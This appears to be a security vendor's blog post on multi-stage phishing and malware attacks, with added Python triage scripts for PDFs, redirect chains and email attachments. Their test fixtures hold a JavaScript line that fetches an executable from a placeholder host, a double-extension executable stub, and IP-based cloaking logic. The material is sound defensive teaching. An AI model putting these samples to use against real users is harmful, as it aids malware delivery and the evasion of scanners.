
Multi-stage cyber attacks, characterized by their complex execution chains, are designed to evade detection and lull victims into a false sense of security. Understanding how they operate is the first step toward building a solid defense strategy against them. Let's examine real-world examples of some of the most common multi-stage attack scenarios active right now.
URLs and Other Embedded Content in Documents
Attackers frequently hide malicious links inside seemingly legitimate documents, such as PDFs or Word files. When the victim opens the document and clicks the embedded link, they are taken to a malicious website. These sites typically use deceptive techniques to get the victim to download malware onto their computer or hand over their passwords.
Another popular form of embedded content is the QR code. Attackers encode malicious URLs in QR codes and place them in documents. The technique pushes users to their mobile devices to scan the code, which then sends them to a phishing site; the phone is usually outside the corporate proxy and mail filters that would have inspected a plain link, and the URL itself never appears as text in the document. These sites usually request login credentials, which are stolen by the attackers the moment they are entered.
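The two document-borne cases above, a clickable link and a QR code that leaves no link at all, can be separated before anything is opened. The following script is an added example (not ANY.RUN's code): it scans the raw PDF bytes for link annotations (`/URI`), auto-executing or script-carrying keys (`/OpenAction`, `/JavaScript`, `/Launch`, `/AA`), and image XObjects, inflating Flate-compressed streams so that keys hidden inside them are seen. A page that draws an image but has no link and no selectable text is flagged as a possible QR-code lure, meaning the image has to be decoded separately. Both sample PDFs are constructed inline; the hostnames in them are placeholders.

```python
import re
import zlib

# Dictionary keys that make a PDF do something on its own or on a click.
ACTIVE_KEYS = (b"/JavaScript", b"/JS", b"/Launch", b"/OpenAction", b"/AA", b"/SubmitForm", b"/GoToR")
URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)")   # /URI (literal string); hex-string form <...> not handled
URL_RE = re.compile(rb"https?://[^\s\"'()<>]+")          # any URL, including ones inside JavaScript
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
IMAGE_RE = re.compile(rb"/Subtype\s*/Image")


def expand_streams(pdf):
    """Return the raw PDF bytes followed by the inflated body of every Flate-compressed
    stream, so that dictionaries stored inside compressed object streams are visible."""
    parts = [pdf]
    for m in STREAM_RE.finditer(pdf):
        try:
            parts.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate-compressed, or damaged; the raw bytes are already in parts
    return b"\n".join(parts)


def triage_pdf(pdf):
    """Static triage: where can this PDF send the reader, and what can it run?"""
    text = expand_streams(pdf)
    uris = [m.group(1).decode("latin-1") for m in URI_RE.finditer(text)]
    urls = sorted({u.decode("latin-1") for u in URL_RE.findall(text)})
    active = [k.decode() for k in ACTIVE_KEYS if k in text]
    images = len(IMAGE_RE.findall(text))
    # Heuristic: a text object (BT ... Tj/TJ ... ET) means the page has selectable text.
    has_text = b"BT" in text and (b"Tj" in text or b"TJ" in text)
    flags = []
    if uris:
        flags.append("clickable link(s) present")
    if active:
        flags.append("active content: " + ", ".join(active))
    if images and not uris and not has_text:
        # An image with no selectable text and no link annotation is the shape of a
        # QR-code lure: the URL lives in the picture, so decode the image separately.
        flags.append("image-only document, no links: possible QR-code lure")
    return {"uris": uris, "urls": urls, "active": active, "images": images, "flags": flags}


# Constructed sample 1: a link annotation plus an OpenAction that runs JavaScript.
LINK_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (https://login-verify.example/office) >> >> endobj
5 0 obj << /S /JavaScript /JS (app.launchURL("https://drop.example/p.exe", true);) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def image_only_pdf():
    """Constructed sample 2: one page that only draws an image XObject (the shape of a
    QR-code lure). The content stream is Flate-compressed, as in real PDFs."""
    content = zlib.compress(b"q 200 0 0 200 50 50 cm /Im0 Do Q")
    parts = [
        b"%PDF-1.4",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj",
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj",
        b"3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R "
        b"/Resources << /XObject << /Im0 5 0 R >> >> >> endobj",
        b"4 0 obj << /Length " + str(len(content)).encode() + b" /Filter /FlateDecode >>",
        b"stream", content, b"endstream", b"endobj",
        b"5 0 obj << /Type /XObject /Subtype /Image /Width 1 /Height 1 "
        b"/ColorSpace /DeviceGray /BitsPerComponent 8 /Length 1 >>",
        b"stream", b"\x00", b"endstream", b"endobj",
        b"trailer << /Root 1 0 R >>", b"%%EOF",
    ]
    return b"\n".join(parts)


if __name__ == "__main__":
    for label, doc in (("link+js", LINK_PDF), ("image-only", image_only_pdf())):
        print(label, triage_pdf(doc))
```

The script deliberately does not render or execute anything; it reads dictionary keys only, so it is safe to run on untrusted input. Its blind spots are worth knowing: `/URI` given as a hex string, names obfuscated with `#xx` escapes, and streams compressed with filters other than Flate all escape these regexes, which is exactly why the sandbox run that follows is still needed.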
Example: PDF File with a QR Code
To show how a typical attack unfolds, let's use the ANY.RUN Sandbox, which provides a safe virtual environment for studying malicious files and URLs. Because it is interactive, this cloud-based service lets us engage with the system just as on a regular computer.
To simplify our analysis, we will enable the Automated Interactivity feature, which performs all the user actions needed to trigger the attack or execute the sample automatically.
Figure: Phishing PDF with a malicious QR code opened in the ANY.RUN sandbox
Consider this sandbox session, which features a malicious .pdf file containing a QR code. With automation switched on, the service extracts the URL from the code and opens it in the browser on its own.
Figure: The final phishing page where victims are prompted to enter their credentials
After several redirects, the attack takes us to the final phishing page, designed to mimic a Microsoft sign-in site. It is controlled by threat actors and configured to steal users' login and password data as soon as it is entered.
Figure: Suricata IDS rule identified a phishing domain chain during analysis
The sandbox makes it possible to observe all network activity taking place during the attack and to see which Suricata IDS rules were triggered.
After completing the analysis, the ANY.RUN sandbox delivers a conclusive "malicious activity" verdict and generates a report on the threat that also includes a list of IOCs.
Multi-stage Redirects
Multi-stage redirects involve a chain of URLs that move users through multiple sites before landing on a malicious destination. Attackers often abuse trusted domains, such as Google's or popular social media platforms like TikTok, to make the redirects appear legitimate: a redirect endpoint on such a domain passes the reputation checks that the final host would fail. This complicates detection of the final malicious URL by security tools.
Some redirect stages may include CAPTCHA challenges to stop automated solutions and filters from reaching the malicious content. Attackers may also add scripts that check the visitor's IP address. If a hosting-provider address, commonly used by security solutions, is detected, the attack chain is interrupted and the visitor is redirected to a legitimate website, preventing access to the phishing page. The practical consequence is that a URL which resolves to a benign site when fetched from a scanner can still be a live phish for a user on a residential or corporate network.
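The chain described in the two paragraphs above can be walked programmatically, and doing so shows both of the attacker's tricks at once. The following is an added example, not ANY.RUN's code. The HTTP transport is a constructed in-memory stand-in (`constructed_site`) so that the script runs offline; every hostname, the `link/v2?target=` parameter shape and the `203.0.113.0/24` "scanner" range are assumptions, not observed values. Hops on a trusted domain are resolved statically from the URL carried in the query string, so the trusted site is never contacted; other hops are resolved from a `Location` header, a `<meta http-equiv="refresh">` tag or a JavaScript `location=` assignment. The walker stops at a CAPTCHA rather than pretending to solve it, and the same start URL yields a benign endpoint from a hosting IP and the phishing page from a residential one.

```python
import ipaddress
import re
from html import unescape
from urllib.parse import parse_qs, urljoin, urlparse

META_REFRESH_RE = re.compile(
    r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]*content=["\']?\d+\s*;\s*url=([^"\'>\s]+)', re.I)
JS_LOCATION_RE = re.compile(r'(?:window\.|document\.)?location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I)
CAPTCHA_MARKERS = ("g-recaptcha", "h-captcha", "cf-turnstile", "challenge-form")
# Assumption: domains whose redirect endpoints attackers borrow for reputation.
OPEN_REDIRECTORS = ("google.com", "tiktok.com", "facebook.com", "linkedin.com")


def open_redirect_target(url):
    """If url is on a trusted domain and carries another absolute URL as a query
    value, return that URL: the hop can be resolved without contacting the site."""
    u = urlparse(url)
    host = u.hostname or ""
    if not any(host == d or host.endswith("." + d) for d in OPEN_REDIRECTORS):
        return None
    for values in parse_qs(u.query).values():
        for v in values:
            if v.startswith(("http://", "https://")):
                return v
    return None


def next_hop(url, status, headers, body):
    """Work out where a fetched page sends the visitor next, or (None, None) if terminal."""
    if 300 <= status < 400 and "Location" in headers:
        return urljoin(url, headers["Location"]), "http-3xx"
    m = META_REFRESH_RE.search(body)
    if m:
        return urljoin(url, unescape(m.group(1))), "meta-refresh"
    m = JS_LOCATION_RE.search(body)
    if m:
        return urljoin(url, m.group(1)), "js-location"
    return None, None


def walk(start, client_ip, fetch, max_hops=10):
    """Follow the chain from start; return ([(url, how_reached), ...], verdict)."""
    hops, seen, url, how = [], set(), start, "start"
    while len(hops) < max_hops:
        hops.append((url, how))
        if url in seen:
            return hops, "loop"
        seen.add(url)
        target = open_redirect_target(url)
        if target:                      # resolved statically, no request made
            url, how = target, "open-redirect-param"
            continue
        status, headers, body = fetch(url, client_ip)
        if any(marker in body for marker in CAPTCHA_MARKERS):
            return hops, "captcha-gate"  # a human, or a sandbox that solves it, is needed here
        url, how = next_hop(url, status, headers, body)
        if url is None:
            return hops, "terminal"
    return hops, "max-hops"


# Constructed chain: TikTok -> Google -> cloaking hop -> CAPTCHA-gated phishing page.
HOSTING_NETS = [ipaddress.ip_network("203.0.113.0/24")]   # constructed "cloud scanner" range
START = ("https://www.tiktok.com/link/v2?aid=1&target="
         "https%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fcdn-hop.example%2Fgo")


def constructed_site(url, client_ip):
    """Stand-in for the real servers in the chain (constructed, runs offline)."""
    u = urlparse(url)
    if u.hostname == "www.google.com":
        return 302, {"Location": parse_qs(u.query)["q"][0]}, ""
    if u.hostname == "cdn-hop.example":
        if any(ipaddress.ip_address(client_ip) in net for net in HOSTING_NETS):
            return 302, {"Location": "https://example.org/"}, ""   # cloaking: scanners get a benign site
        return 200, {}, '<html><meta http-equiv="refresh" content="0;url=https://secure-login.example/auth"></html>'
    if u.hostname == "secure-login.example":
        return 200, {}, '<html><form class="challenge-form"><div class="cf-turnstile"></div></form></html>'
    return 200, {}, "<html>benign</html>"


if __name__ == "__main__":
    for ip in ("198.51.100.7", "203.0.113.9"):
        hops, verdict = walk(START, ip, constructed_site)
        print(ip, verdict, [h[0] for h in hops])
```

To use it live, replace `constructed_site` with a function that issues one request per hop with redirects disabled (for example `urllib.request` with a custom `HTTPRedirectHandler`, or `requests.get(url, allow_redirects=False)`) and returns `(status, headers, body)`. Run it from more than one network vantage point before trusting a "terminal: benign" result.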
Example: Chain of Links Leading to a Phishing Page
Here is a sandbox session showing the entire attack chain, starting from a seemingly legitimate TikTok link.
Figure: TikTok URL containing a redirect to a Google domain
Yet a closer look reveals that the full URL contains a redirect to a legitimate Google domain.
Figure: ANY.RUN automatically solves the CAPTCHA, moving on to the next stage of the attack
From there, the attack moves on to another site with a redirect and then to the final phishing page, which is, however, protected by a CAPTCHA challenge.
Figure: Fake Outlook page intended for stealing user data
Thanks to advanced content analysis, the sandbox automatically solves this CAPTCHA, allowing us to observe the fake page designed to steal victims' credentials.
Email Attachments
Email attachments continue to be a prevalent vector for multi-stage attacks. In the past, attackers frequently sent emails with Office documents containing malicious macros.
Currently, the focus has shifted to archives that contain payloads and scripts. Archives give threat actors a simple and effective way to hide malicious executables from security mechanisms and increase the apparent trustworthiness of the files; a password-protected archive, with the password quoted in the email body, is opaque to most gateway scanners while remaining trivial for the victim to open.
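Before detonating such an attachment, it is worth listing what the archive holds, since the layout itself (an executable named like a document, a script beside a decoy, a nested or password-protected archive) is usually enough to route the message for sandboxing. The script below is an added example, not ANY.RUN's code: it parses an RFC 822 message with the standard library, inspects every attachment, and for zip attachments enumerates the members without extracting them, flagging executable or script extensions, double extensions that mimic a document, nested archives, encrypted members, and files whose first bytes are a PE header regardless of what the name claims. The message and its zip are constructed inline; the addresses and file names are placeholders.

```python
import io
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage
from pathlib import PurePosixPath

EXEC_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".jse", ".vbs", ".vbe",
            ".wsf", ".hta", ".ps1", ".lnk", ".msi", ".dll"}
ARCHIVE_EXT = {".zip", ".rar", ".7z", ".iso", ".img", ".gz", ".tar", ".cab"}
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}


def inspect_zip(data):
    """List the members of a zip and flag risky ones, without extracting or running anything."""
    members = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for zi in z.infolist():
            if zi.is_dir():
                continue
            suffixes = [s.lower() for s in PurePosixPath(zi.filename).suffixes]
            encrypted = bool(zi.flag_bits & 0x1)
            flags = []
            if encrypted:
                flags.append("password-protected: opaque to content scanners")
            if suffixes and suffixes[-1] in EXEC_EXT:
                flags.append("executable or script " + suffixes[-1])
            if len(suffixes) >= 2 and suffixes[-1] in EXEC_EXT and suffixes[-2] in DOC_EXT:
                flags.append("double extension mimics a document")
            if suffixes and suffixes[-1] in ARCHIVE_EXT:
                flags.append("nested archive")
            if not encrypted:
                with z.open(zi) as fh:
                    if fh.read(2) == b"MZ":      # PE header, whatever the name claims
                        flags.append("PE header (MZ)")
            members.append({"name": zi.filename, "size": zi.file_size, "flags": flags})
    return members


def triage_message(raw):
    """Parse a raw message and inspect each attachment; zips are listed member by member."""
    msg = message_from_bytes(raw, policy=policy.default)
    report = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        data = part.get_payload(decode=True) or b""
        suffix = PurePosixPath(name).suffix.lower()
        entry = {"attachment": name, "type": part.get_content_type(), "members": [],
                 "flags": ["executable attachment " + suffix] if suffix in EXEC_EXT else []}
        if data.startswith(b"PK\x03\x04"):      # zip magic; trusted over the declared MIME type
            entry["members"] = inspect_zip(data)
        report.append(entry)
    return report


def verdict(report):
    """'suspicious' if any attachment or archive member carries a risk flag, else 'clean'."""
    risky = [e for e in report if e["flags"] or any(m["flags"] for m in e["members"])]
    return "suspicious" if risky else "clean"


def build_sample_eml():
    """Constructed phishing message: a zip whose members follow the layout described
    above, an executable named like an invoice next to a harmless-looking decoy."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("Invoice_2024-11.pdf.exe", b"MZ" + b"\x00" * 62)   # PE stub, double extension
        z.writestr("readme.txt", b"Please find the invoice attached.")
        z.writestr("extra/Payment.js", b"var s = 'test';")
    msg = EmailMessage()
    msg["From"] = "billing@supplier.example"
    msg["To"] = "ap@victim.example"
    msg["Subject"] = "Overdue invoice"
    msg.set_content("See attached.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="Invoice.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    report = triage_message(build_sample_eml())
    print(verdict(report))
    for entry in report:
        print(entry["attachment"], entry["type"], entry["flags"])
        for m in entry["members"]:
            print("  ", m["name"], m["size"], m["flags"])
```

Only zip is unpacked here because the standard library can read it; for RAR, 7z, ISO or disk images the same checks apply but need the corresponding reader. A member that is encrypted is reported as such rather than skipped, since the presence of a password-protected archive in unsolicited mail is itself a signal, and everything the script reports comes from headers and the first two bytes of each member, so nothing from the attachment is ever executed.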
Example: Email Attachment with FormBook Malware
In this sandbox session, we can see a phishing email that contains a .zip attachment. The service automatically opens the archive, which has several files inside.
Figure: Phishing email with an archive attached
With Smart Content Analysis, the service identifies the main payload and launches it, which starts the execution chain and lets us see how the malware behaves on a live system.
Figure: Suricata IDS rule used for detecting FormBook's connection to its C2
The sandbox detects FormBook and logs all of its network and system activity, as well as providing a detailed threat report.
Get Your Black Friday Deal from ANY.RUN
Analyze suspicious emails, files, and URLs in the ANY.RUN sandbox to quickly identify cyber attacks. With Automated Interactivity, the service can perform all the necessary analysis steps on its own, saving you time and presenting you only with the essential insights into the threat at hand.
Figure: Black Friday offer from ANY.RUN
ANY.RUN is currently offering Black Friday deals. Get yours before December 8:
- For individual users: 2 licenses for the price of 1.
- For teams: up to 3 licenses + an annual basic plan for Threat Intelligence Lookup, ANY.RUN's searchable database of the latest threat data.
See all offers and try the service with a free trial today.
Conclusion
Multi-stage attacks are a significant threat to organizations and individuals alike. Some of the most common attack scenarios include URLs and embedded content in documents, QR codes, multi-stage redirects, email attachments, and archived payloads. By analyzing these with tools like ANY.RUN's Interactive Sandbox, we can better defend our infrastructure.